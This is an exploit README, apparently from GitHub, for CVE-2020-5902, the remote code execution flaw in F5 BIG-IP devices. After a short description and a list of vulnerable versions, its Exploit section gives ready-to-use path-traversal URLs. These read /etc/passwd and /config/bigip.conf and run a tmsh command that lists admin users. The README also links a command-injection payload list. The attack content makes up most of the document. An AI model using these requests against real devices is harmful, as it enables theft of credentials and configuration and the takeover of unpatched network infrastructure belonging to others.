BIG-IP F5 Remote Code Execution# RCE-CVE-2020-5902
BIG-IP F5 Remote Code Execution
# Description
These attacks are targeting BIG-IP, a multi-purpose networking device manufactured by F5 Networks. BIG-IP devices can be configured to work as traffic shaping systems, load balancers, firewalls, access gateways, rate limiters, or SSL middleware.
On Wednesday, F5 Networks published patches and released a security advisory about a "remote code execution" vulnerability in BIG-IP devices.
F5 said the vulnerability, tracked as CVE-2020-5902, could allow attackers to take full control over unpatched systems that are accessible on the internet.
```bash
Version BIG-IP Vulnerable : 15.0.0-15.1.0.3, 14.*.*, 13.*.*, 12.*.*, 11.*.*
Vulnerability : Remote Code Execution (RCE)
Score CVE : 10/10
```
# Exploit
```bash
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
```
```bash
https://BIG-IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
```
```bash
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
```
# NMAP Check
<img src="https://pbs.twimg.com/media/EcLphgrXQAIiiN8?format=png&name=4096x4096" alt="" aria-label="nse" src="" width=“50” height=“50”>
# Payload RCE
https://github.com/payloadbox/command-injection-payload-list
# Reference
https://twitter.com/Nep_1337_1998/status/1279610946864820225
https://www.zdnet.com/article/hackers-are-trying-to-steal-admin-passwords-from-f5-big-ip-devices/
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view